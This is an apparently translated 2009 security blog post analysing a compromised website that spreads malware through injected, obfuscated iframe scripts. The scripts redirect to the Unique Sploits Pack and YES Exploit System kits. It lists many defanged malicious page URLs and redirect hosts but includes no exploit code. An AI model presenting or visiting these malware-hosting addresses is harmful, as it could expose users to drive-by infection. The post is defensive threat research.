Monday, April 20, 2009

Scripting attack II. Conjunction of crimeware for increased infection

Another technique widely used by cyber-criminals to attack computers via web scripting is the injection of malicious instructions in the code of the page.

In this case, a website hosted on a server breach is used as a vector for spreading malware through the exploitation of vulnerabilities in computers unprotected. Some of the pages used are:

http://team-sleep.by .ru/default2 .html
http://team-sleep.by .ru/demo .html
http://team-sleep.by .ru/disco .html

http://team-sleep.by .ru/downloads .html
http://team-sleep.by .ru/enter .html
http://team-sleep.by .ru/gold .html
http://team-sleep.by .ru/googleanalyticsru .html
http://team-sleep.by .ru/guest .html
http://team-sleep.by .ru/guestbook .html
http://team-sleep.by .ru/media .html
http://team-sleep.by .ru/menu .html
http://team-sleep.by .ru/news .html
http://team-sleep.by .ru/photo2 .html
http://team-sleep.by .ru/poem .html
http://team-sleep.by .ru/press_reviews .html
http://team-sleep.by .ru/team-sleep .html
http://team-sleep.by .ru/wallpapers .html
http://team-sleep.by .ru/gmail .php
http://team-sleep.by .ru/haitou .php
http://team-sleep.by .ru/in .php
http://team-sleep.by .ru/xxx .php
http://team-sleep.by .ru/photo/team .html
http://team-sleep.by .ru/photo/wallz .html
http://team-sleep.by .ru/photo/live/index2 .html
http://team-sleep.by .ru/photo/live/imagepages/image1 .html
http://team-sleep.by .ru/photo/members/imagepages/image1 .html
http://team-sleep.by .ru/photo/team/imagepages/image1 .html


The list is long (98 pages of a site). However, through the graph are all represented.

Each of these web addresses are disseminated through channels such as email or instant messaging clients using a strategy of social engineering, and housed several different script containing obfuscated exploits.

Decoder to the scripts, we find the use of iframe tags that redirect to other URL's such as:
  • http://5rublei .com/unique/index .php
  • http://tochtonenado .com/yes/index .php
A very interesting point in relation to crimeware, refers directly to the concept of vulnerability, ie, the crimeware not a weakness is exempted by design flaws in its code, which allows us to elaborate a little more knowledge on crimeware violating their integrity.

As we see in the picture, it appears that it's the job of two known crimeware, Unique Sploits Pack and YES Exploit System.

This shows that cyber-criminals are constantly looking to find a quick and simple way, the more automated the better, different forms of attack to increase profits.

In this way, the work "professional" behind these malicious malware where the main actor is seeking to expand the range of infections, botmaster manage activities harmful to a greater flow of distribution.

Related Information
Scripting attack. Exploitation of multiple vulnerabilities - Spanish version
Exploitation of vulnerabilities through PDFs - Spanish version
Exploiting vulnerabilities through SWF - Spanish version
Exploitation of vulnerabilities through JS - Spanish version
Analysis of an attack of web-based malware - Spanish version
LuckySploit, the right hand of Zeus - Spanish version
Massive exploitation of vulnerabilities through servers ghosts - Spanish version


# Jorge Mieres

No comments: